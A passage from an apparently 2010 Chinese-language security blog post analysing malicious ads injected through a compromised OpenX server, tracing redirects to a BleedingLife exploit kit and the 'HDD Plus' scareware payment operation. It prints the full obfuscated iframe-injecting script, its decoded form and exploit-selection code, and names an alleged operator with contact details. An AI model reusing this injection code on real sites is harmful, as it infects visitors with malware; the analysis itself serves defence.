this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new org.openx.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};org.openx.SWFObjectUtil.getPlayerVersion=function(){var _23=new org.openx.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new org.openx.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new org.openx.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};org.openx.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};org.openx.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};org.openx.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};org.openx.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(org.openx.SWFObject.doPrepUnload){if(!org.openx.unloadSet){org.openx.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",org.openx.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",org.openx.SWFObjectUtil.prepUnload);org.openx.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=org.openx.util.getRequestParameter;var FlashObject=org.openx.SWFObject;var SWFObject=org.openx.SWFObject;document.mmm_fo=1;var OX_8ec3b89b = '';<br />OX_8ec3b89b += "<"+"script language=\"JavaScript\">var dc=document; var date_ob=new Date(); dc.cookie=\'h1=o; path=/;\';if(dc.cookie.indexOf(\'3=llo\') <"+"= 0 && dc.cookie.indexOf(\'1=o\') > 0){\n";<br />OX_8ec3b89b += "function clng(wrd){var cou=new Array(\'en-us\',\'en-ca\',\'en-au\',\'en-gb\',\'fr-ca\',\'fr\',\'de\',\'es\',\'it\');for(i=0;i<"+"cou.length;i++){if(wrd==cou[i])return true;}return false;}\n";<br />OX_8ec3b89b += "if(typeof navigator.language == \'undefined\'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\n";<br />OX_8ec3b89b += "if(typeof run == \'undefined\'&&clng(nav.toLowerCase())){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://finofalts.com/ke7rwdtw.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n";<br />OX_8ec3b89b += "date_ob.setTime(date_ob.getTime()+864*100000);dc.cookie=\'h3=llo; path=/; expires=\'+date_ob.toGMTString();}<"+"/script>\n";<br />OX_8ec3b89b += "<"+"div id=\'ox_30e97ef3c2c6a8e24bb919f7fe3adba6\' style=\'display: inline;\'><"+"img src=\'http://openx.takeatime.com/www/images/1x1.gif\' alt=\'\' title=\'\' border=\'0\' /><"+"/div>\n";<br />OX_8ec3b89b += "<"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";<br />OX_8ec3b89b += "var ox_swf = new FlashObject(\'http://openx.takeatime.com/www/delivery/ai.php?filename=blizoo_hd_campaign_728x90.swf&contenttype=swf\', \'Advertisement\', \'728\', \'90\', \'8\');\n";<br />OX_8ec3b89b += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";<br />OX_8ec3b89b += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fopenx.takeatime.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D54__zoneid%3D1__cb%3D1e6e188d82__oadest%3Dhttp%253A%252F%252Fwww.blizoo.bg%252Ftelevision%252Fhd.html\');\n";<br />OX_8ec3b89b += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";<br />OX_8ec3b89b += "ox_swf.write(\'ox_30e97ef3c2c6a8e24bb919f7fe3adba6\');\n";<br />OX_8ec3b89b += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<"+"div id=\'beacon_1e6e188d82\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://openx.takeatime.com/www/delivery/lg.php?bannerid=54&campaignid=26&zoneid=1&loc=http%3A%2F%2Ftakeatime.com%2F&cb=1e6e188d82\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); }\n";<br />OX_8ec3b89b += "// ]]> --><"+"/script><"+"script type=\"text/javascript\">var yoZ=[\'79\',\'89\',\'b0\',\'bb\',\'bf\',\'b2\',\'6e\',\'af\',\'7c\',\'bb\',\'c2\',\'7c\',\'b4\',\'bc\',\'bc\',\'b8\',\'6e\',\'7c\',\'90\',\'c0\',\'b2\',\'bb\',\'ad\',\'6e\',\'b1\',\'b5\',\'c5\',\'85\',\'b1\',\'bb\',\'7b\',\'6e\',\'8a\',\'b8\',\'be\',\'7c\',\'b1\',\'7f\',\'80\',\'79\',\'b0\',\'89\',\'ad\',\'c0\',\'be\',\'b1\',\'8a\',\'b0\',\'6c\',\'b4\',\'ad\',\'7d\',\'ae\',\'82\',\'b5\',\'89\',\'af\',\'be\',\'6e\',\'b1\',\'bf\',\'90\',\'88\',\'b9\',\'88\',\'6e\',\'b5\',\'b1\',\'89\',\'7e\',\'ad\',\'7c\',\'92\',\'be\',\'c2\',\'6e\',\'b5\',\'79\',\'c2\',\'c0\',\'be\',\'c0\',\'8a\',\'ad\',\'b5\',\'b0\',\'b9\',\'ad\',\'6e\',\'87\',\'7a\',\'8f\',\'ad\',\'88\',\'be\',\'7a\',\'b1\',\'8a\',\'89\',\'84\',\'90\',\'b8\',\'c2\',\'b8\',\'6c\',\'bf\',\'7c\',\'6e\',\'7d\',\'be\',\'bf\',\'6e\',\'bb\',\'bf\',\'7c\',\'be\',\'6c\',\'86\',\'6c\',\'b4\',\'6c\',\'c2\',\'7d\',\'6e\',\'8a\',\'be\',\'bc\',\'80\',\'ba\',\'bc\',\'af\',\'ba\',\'90\',\'8d\',\'6e\',\'6e\',\'83\',\'ad\',\'8b\',\'bf\',\'b2\',\'6e\',\'c5\',\'89\',\'af\',\'b4\',\'be\',\'89\',\'7b\',\'b9\',\'7f\',\'be\',\'6e\',\'b5\',\'af\',\'90\',\'ba\',\'ad\',\'ba\',\'7b\',\'b5\',\'6c\',\'7a\',\'b3\',\'88\',\'b1\',\'6c\',\'bc\',\'88\',\'b5\',\'6c\',\'ad\',\'89\',\'7b\',\'8a\',\'c0\',\'b4\',\'af\',\'af\',\'bc\',\'7b\',\'7b\',\'c3\',\'88\',\'ad\',\'ba\',\'bc\',\'6c\',\'b5\',\'b4\',\'be\',\'b1\',\'6e\',\'b3\',\'c0\',\'86\',\'89\'];var M__=[86,156,153,151,124,179,157,61,119,164,134,120,114,49,136,16,11,142,95,47,35,62,188,26,24,13,7,87,128,173,186,117,32,165,36,131,111,94,79,81,12,129,17,56,55,183,190,75,122,102,37,118,150,80,99,103,43,155,143,9,14,78,28,182,191,141,57,154,10,77,54,158,92,195,1,130,112,91,187,115,163,6,184,30,74,100,38,137,132,25,63,85,181,176,42,60,149,196,116,84,83,8,29,166,40,135,107,96,105,152,41,121,22,5,106,31,20,19,109,123,97,193,58,104,27,3,53,89,172,15,138,23,93,88,174,159,90,126,73,161,145,45,18,170,127,110,180,44,52,148,59,146,108,178,65,82,68,194,168,66,67,144,69,169,0,139,160,125,185,34,133,147,76,177,175,101,71,64,162,70,51,192,98,33,2,21,72,4,167,46,189,39,171,113,48,50,140];var bG0=new Array();for(var tRj=0;tRj<"+"M__.length;tRj++){bG0[tRj]=[M__[tRj],yoZ[tRj]];}function iL5(JrO,GTx){if(JrO[0]>GTx[0]){return 1;}else{if(JrO[0]<"+"GTx[0]){return -1;}else{return 0;}}}bG0.sort(iL5);function LHA(Yi5){return unescape(Yi5);}var XzH=new Array();for(var NOW=0;NOW<"+"bG0.length;NOW++){XzH[NOW]=String.fromCharCode(\'3\'+\'7\')+bG0[NOW][1];}function NhW(M3s){return M3s.join(\'\');}function T5_(OrK,yPk){var wC3=\'M5U1kEWlqVNxC8vXQpZK6s20YrbHe9whdngyGAtOijmaLfBzJT7oPIRFDcS43u\';var QiL=new Array();for(var lVh=0;lVh<"+"OrK.length;lVh++){QiL[lVh]=wC3.charAt(OrK[lVh]);}return NhW(QiL);}function gEp(ICO,wzs){var kkz=new Array();for(var z7r=0;z7r<"+"ICO.length;z7r++){kkz[z7r]=String[T5_([45,25,51,42,12,31,43,25,12,51,32,28],0)](ICO[T5_([57,31,43,25,12,51,32,28,37,38],0)](z7r)-wzs);}document.write(NhW(kkz));}gEp(LHA(NhW(XzH)),LHA(\'%37%36\'));<"+"/script>\n";<br />document.write(OX_8ec3b89b);</pre><br />其中顯而易見的一行:<br /><pre class="brush: html;"><br />OX_8ec3b89b += "if(typeof run == \'undefined\'&&clng(nav.toLowerCase())){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://finofalts.com/ke7rwdtw.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n";<br /></pre><br />它建立了一個iframe指到一個已知的惡意網域finofalts.com網址如下: http://finofalts.com/ke7rwdtw.php?s=IBB@G,當我們在寫這篇報導時它已經不運作了。它整個script在解混碼後為:<br /><pre class="brush: html;"><br /><script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){<br />function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}<br />if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}<br />if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\"text/javascript\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://finofalts.com/ke7rwdtw.php?s=IBB@G\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');");dc.writeln("//--><\/script>");} var run=1;<br />date_ob.setTime(date_ob.getTime()+ 864*100000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script><br /><div id='ox_30e97ef3c2c6a8e24bb919f7fe3adba6' style='display: inline;'><img src='http://openx.takeatime.com/www/images/1x1.gif' alt='' title='' border='0' /></div><br /><script type='text/javascript'><!--// <![CDATA[<br />var ox_swf = new FlashObject('http://openx.takeatime.com/www/delivery/ai.php?filename=blizoo_hd_campaign_728x90.swf&contenttype=swf', 'Advertisement', '728', '90', '8');<br />ox_swf.addVariable('clickTARGET', '_blank');<br />ox_swf.addVariable('clickTAG', 'http%3A%2F%2Fopenx.takeatime.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D54__zoneid%3D1__cb%3D1e6e188d82__oadest%3Dhttp%253A%252F%252Fwww.blizoo.bg%252Ftelevision%252Fhd.html');<br />ox_swf.addParam('allowScriptAccess','always');<br />ox_swf.write('ox_30e97ef3c2c6a8e24bb919f7fe3adba6');<br />if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute('version'))) { document.write("<div id='beacon_1e6e188d82' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://openx.takeatime.com/www/delivery/lg.php?bannerid=54&campaignid=26&zoneid=1&loc=http%3A%2F%2Ftakeatime.com%2F&cb=1e6e188d82' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"); }<br />// ]]> --></script><script type="text/javascript">var yoZ=['79','89','b0','bb','bf','b2','6e','af','7c','bb','c2','7c','b4','bc','bc','b8','6e','7c','90','c0','b2','bb','ad','6e','b1','b5','c5','85','b1','bb','7b','6e','8a','b8','be','7c','b1','7f','80','79','b0','89','ad','c0','be','b1','8a','b0','6c','b4','ad','7d','ae','82','b5','89','af','be','6e','b1','bf','90','88','b9','88','6e','b5','b1','89','7e','ad','7c','92','be','c2','6e','b5','79','c2','c0','be','c0','8a','ad','b5','b0','b9','ad','6e','87','7a','8f','ad','88','be','7a','b1','8a','89','84','90','b8','c2','b8','6c','bf','7c','6e','7d','be','bf','6e','bb','bf','7c','be','6c','86','6c','b4','6c','c2','7d','6e','8a','be','bc','80','ba','bc','af','ba','90','8d','6e','6e','83','ad','8b','bf','b2','6e','c5','89','af','b4','be','89','7b','b9','7f','be','6e','b5','af','90','ba','ad','ba','7b','b5','6c','7a','b3','88','b1','6c','bc','88','b5','6c','ad','89','7b','8a','c0','b4','af','af','bc','7b','7b','c3','88','ad','ba','bc','6c','b5','b4','be','b1','6e','b3','c0','86','89'];var M__=[86,156,153,151,124,179,157,61,119,164,134,120,114,49,136,16,11,142,95,47,35,62,188,26,24,13,7,87,128,173,186,117,32,165,36,131,111,94,79,81,12,129,17,56,55,183,190,75,122,102,37,118,150,80,99,103,43,155,143,9,14,78,28,182,191,141,57,154,10,77,54,158,92,195,1,130,112,91,187,115,163,6,184,30,74,100,38,137,132,25,63,85,181,176,42,60,149,196,116,84,83,8,29,166,40,135,107,96,105,152,41,121,22,5,106,31,20,19,109,123,97,193,58,104,27,3,53,89,172,15,138,23,93,88,174,159,90,126,73,161,145,45,18,170,127,110,180,44,52,148,59,146,108,178,65,82,68,194,168,66,67,144,69,169,0,139,160,125,185,34,133,147,76,177,175,101,71,64,162,70,51,192,98,33,2,21,72,4,167,46,189,39,171,113,48,50,140];var bG0=new Array();for(var tRj=0;tRj<M__.length;tRj++){bG0[tRj]=[M__[tRj],yoZ[tRj]];}function iL5(JrO,GTx){if(JrO[0]>GTx[0]){return 1;}else{if(JrO[0]<GTx[0]){return -1;}else{return 0;}}}bG0.sort(iL5);function LHA(Yi5){return unescape(Yi5);}var XzH=new Array();for(var NOW=0;NOW<bG0.length;NOW++){XzH[NOW]=String.fromCharCode('3'+'7')+bG0[NOW][1];}function NhW(M3s){return M3s.join('');}function T5_(OrK,yPk){var wC3='M5U1kEWlqVNxC8vXQpZK6s20YrbHe9whdngyGAtOijmaLfBzJT7oPIRFDcS43u';var QiL=new Array();for(var lVh=0;lVh<OrK.length;lVh++){QiL[lVh]=wC3.charAt(OrK[lVh]);}return NhW(QiL);}function gEp(ICO,wzs){var kkz=new Array();for(var z7r=0;z7r<ICO.length;z7r++){kkz[z7r]=String[T5_([45,25,51,42,12,31,43,25,12,51,32,28],0)](ICO[T5_([57,31,43,25,12,51,32,28,37,38],0)](z7r)-wzs);}document.write(NhW(kkz));}gEp(LHA(NhW(XzH)),LHA('%37%36'));</script><br /></pre><br />其中"document.write(NhW(kkz));"這一部份在解混碼後會產生了另一個iframe,內容如下<br /><br /><pre class="brush: html;"><var style="display: none;"><var><iframe src="http://parti13.co.cc/in.php?id=2D46-DD8C-9A47-FD3D" width="100" height="100" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe></var></var><br /></pre><br />這會讓瀏覽器再來載入http://parti13.co.cc/in.php?id=2D46-DD8C-9A47-FD3D,而它的內容如下:<br /><pre class="brush: html;"><br />HTTP/1.1 302 Moved Temporarily<br />Date: Wed, 15 Dec 2010 17:45:29 GMT<br />Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3<br />X-Powered-By: PHP/5.3.3<br />Location: http://govtds09.co.cc/tds/in.cgi?default<br />Content-Length: 0<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: text/html<br /></pre><br />這個iframe再被做重導至http://govtds09.co.cc/tds/in.cgi?default,內容如下:<br /><pre class="brush: html;"><br /><html><frameset rows="100%"><frame src="http://expa42.co.cc/bl3/"></frameset></html><br /></pre><br />最後這邊的expa42.co.cc就是exploit server了(安裝著BleedingLife V2),它會根據使用者的環境來載入相對應的Exploit:<br /><br /><pre class="brush: html;">if(acrobat.installed){<br />if(acrobat.version >= 800 && acrobat.version < 821){<br />("http://expa42.co.cc/bl3/load.php?e=Adobe-80-2010-0188");<br />}else if(acrobat.version >= 900 && acrobat.version < 940){<br />if(acrobat.version < 931){<br /> ("http://expa42.co.cc/bl3/load.php?e=Adobe-90-2010-0188");<br />}else if(acrobat.version < 933){<br /> ("http://expa42.co.cc/bl3/load.php?e=Adobe-2010-1297");<br />}else if(acrobat.version < 940){<br /> ("http://expa42.co.cc/bl3/load.php?e=Adobe-2010-2884");<br />}<br />}else if(acrobat.version >= 700 && acrobat.version < 711){<br />("http://expa42.co.cc/bl3/load.php?e=Adobe-2008-2992");<br />} <br /><br />if(ojava.installed){<br />if(ojava.version < 6 || (ojava.version == 6 && ojava.build < 19)){<br /> ("http://expa42.co.cc/bl3/load.php?e=Java-2010-0842");<br />}else if(ojava.version == 6 && ojava.build < 22){<br /> ("http://expa42.co.cc/bl3/load.php?e=Java-2010-3552");<br />}<br />}<br /></pre><br />在寫這篇報導時,這個Exploit pack中的exploits,掃毒軟體對於它的偵測率是相當低的。例如http://expa42.co.cc/bl3/load.php?e=Java-2010-3552 (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3552">CVE-2010-3552</a>)這個exploit <a href="http://www.virustotal.com/file-scan/report.html?id=fe5aad0b555500bf52bec20a53491fb360762861c85dbc5884aa7f5ab7f33a9b-1292636820">1/43 on VirusTotal</a> 及 <a href="http://virusscan.jotti.org/en/scanresult/e1916a8338e1fc6e9e649d4a6c91faf2a1504c86">0/19 on jotti</a>, 而load.php?e=Adobe-2010-2884 (<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=218483821265679898" org="" bin="" name="CVE-2010-2884">CVE-2010-2884</a>) 目前的偵測率為 <a href="http://www.virustotal.com/file-scan/report.html?id=c7e5063d38e2104a15448ad3f45167d97afb36006a38bd3f7c68dc97d6dc67bd-1292493783">5/43 在 VirusTotal上</a> 及 <a href="http://virusscan.jotti.org/en/scanresult/becb6e1fb71264cd95ffd4d80aefac3ceeb0ceda">2/19 在joiit上</a>。</div><div><br />在成功之後會來執行shellcode然後會來下載執行檔來執行:http://expa42.co.cc/bl3/load.php?e=XX, 這邊的 XX 為exploit的名稱,而http://expa42.co.cc/bl3/drop.php?e=Adobe-90-2010-0188即所下載的執行檔。目前所有的執行檔都是同一個,即HDD Tool這個惡意軟體。而防毒軟體對它的偵測率約為50%:<a href="http://www.virustotal.com/file-scan/report.html?id=12f582d21e2517d013c3a6029c601686cd63903cc2feaaad78a1212c17adcb60-1292487673">15/43 在VirusTotal上</a>,及<a href="http://virusscan.jotti.org/en/scanresult/3aee30a15393e967822c98bc2bae5b07a00e06a3">11/19在jotti上</a>。<br /><br /><b>[這一切背後的藏鏡人]</b><br />HDD Plus先前透過DoubleClick及MSN來散播,而現在又透過受入侵的OpenX平台。我們想要知道,這背後究竟是何人所為。根據我們的經驗這些散播惡意程式的人(如上傳AdShufffle假廣告,入侵OpenX平台,等等)和開發這個惡意程式的人及收取費用的人,通常不是同一個單一團體。但是被入侵的站台(如takeatime.com)及惡意網域(如finofalts.com,parti13.co.cc,expa42.co.cc等等以及大部份的co.cc)這實在太多了,若要朝此方向真的不好追查,然而付費流程就不會如此的多,因為它須要花更多的時間來設計這整個付費機制,所以這邊將是我們開始調查的重點方向。<br /><br />當受害者嘗試要付費的時候,HDD Plus及HDD Tools會連線到以下兩個網域:defragstore.com (註冊於2010年6月30日)及 onlinepaydebt.com (註冊於2010年9月27日),而這兩個網域正查後指到同一個IP 94.76.192.210(UK PoundHost專用)。 這個defragstore.com列了一個客服專線:+1-877-282-0139。這個專線跟受害者付費後的發票開立是同一條,它會接到位於印度的一個客服中心系統。若你不想訂購,他們也會很快的退還你的錢。好讓你覺得他是一家正常運作的公司。<b>這是一個典型的恫嚇軟體(Scareware)的行為模式,因為付費機制不容易建立,所以當發生問題或你不想要訂購他們是會退你錢的。也因此他們的這個付費閘道才不會被銀行撤下,不過在這過程你的個資(像信用卡等資訊)可能已被偷走了。</b> 而在發票上的公司名稱為 "SecurityLabSoftware",帳單上所秀的creditor則為"trd-app.com"。<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TQwn_EwDl_I/AAAAAAAACJ4/opIz3oCYO0A/s1600/defragstore_com.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;;" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TQwn_EwDl_I/AAAAAAAACJ4/opIz3oCYO0A/s1600/defragstore_com.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5551856405201524722" /></a><br />這個客服網站允許顧客登入去下載它的軟體及檔案等:http://acideds.org/customers (註冊於2010年11月2日)<br /><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_hELDi5B8zOI/TQwrcv0I12I/AAAAAAAACKA/2m6LORTtvwo/s1600/hdd_plus_customer_support.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_hELDi5B8zOI/TQwrcv0I12I/AAAAAAAACKA/2m6LORTtvwo/s1600/hdd_plus_customer_support.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5551860213512460130" /></a><br />這邊有相當多的網域,因為有一些可能會被拿下或被標示成惡意:<br />http://earlyeds.org/customers<br />http://dirtyeds.org/customers<br />http://edsclick.com/customers<br />http://www.edsclick.com/customers<br /><br />好,那麼現在我們有了:幫忙開發網站的、有了付費機制、有了客服中心、也有了託管公司等相關資訊後。我們開始連繫他們許多人,其中包括有位於歐洲的、英國的、印度的及蘇俄的,而這些所有的人都說,這一切都是由一位在莫斯科名叫Dmitry Slevin先生所規劃開發的,並給了我們他的電子信箱,之後我們使用whois找到了他的電話。<br /><br />首先我們先得知了Slevin先生從2009/11到2010/06期間,擁有malwaremechanic.com這個網域,<a href="http://malwareint.blogspot.com/2010/01/recent-tour-of-scareware-xx.html">而這個malwaremechanic.com是一個已知的恫嚇軟體(scareware</a>)。<br /><pre><br />(this is hostorical whois data and dates Nov 6th, 2009)<br />Domain Name: MALWAREMECHANIC.COM<br /> Created on: 10-Oct-07<br /> Expires on: 10-Oct-10<br /> Last Updated on: 05-Nov-09<br /><br />Administrative Contact:<br /> Esaulova, Alla slevintm@gmail.com<br /> MDA Systems ltd<br /> 35 Brompton Road, Knightsbridge<br /> London, London SW3 1DE<br /> United Kingdom<br /> +44.4402078080190 Fax --<br /></pre><br />然後我們又得知了在12月6日,Slevin先生註冊了systemutilites.com這個網域,在這邊我們可以下載體驗版的 "System Utilities"。它不僅在外觀上跟HDD Plus and HDD Tools有些雷同之外,它也同時觸發了防毒軟體<a href="http://www.virustotal.com/file-scan/report.html?id=98b5d5f88fcbffc0bf04bf8f5491bc411871f610a45ec3db732b3fbdd50914cb-1292645691">24/45 (判定為FakeAV)在VirusTotal上</a>,及<a href="http://virusscan.jotti.org/en/scanresult/ecd1160e3955c69659764ab9ceb3894ff04b4a19">9/19 在jotti上</a>。<div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TQw41P3LQXI/AAAAAAAACKQ/42zd1Pm4aZM/s1600/systemutiliteswebsite.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand; width:748px;" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TQw41P3LQXI/AAAAAAAACKQ/42zd1Pm4aZM/s1600/systemutiliteswebsite.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5551874928083157362" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_hELDi5B8zOI/TQw3xjMJ8pI/AAAAAAAACKI/cfj6w8AY_PM/s1600/systemutilites.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand; width:748px;" src="http://2.bp.blogspot.com/_hELDi5B8zOI/TQw3xjMJ8pI/AAAAAAAACKI/cfj6w8AY_PM/s1600/systemutilites.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5551873765040321170" /></a><br />我們發了封信給Slevin先生,隨後在電話中與他交談。起初他否認他知道這個defragstore.com,並說這不是他的網域。不過他後來改變了他的說詞,說這個網域是跟他相關的,並說他只是一個靠賣網域賺些錢的人而已。也說願意提供HDD Plus/Tools及SystemUtilites背後的連繫管道給我們。<br /><br />他也同時否認所有各方(網站開發,託管,客服中心等)對他的指認,我們不知道這位Slevin先生在整個"HDD Plus"行動中真正所扮演腳色地位,不過我們確信他的確參與在其中,並且選擇性的告訴我們他所知的一小部份。<br /></div></div></div><div><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-218483821265679898?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
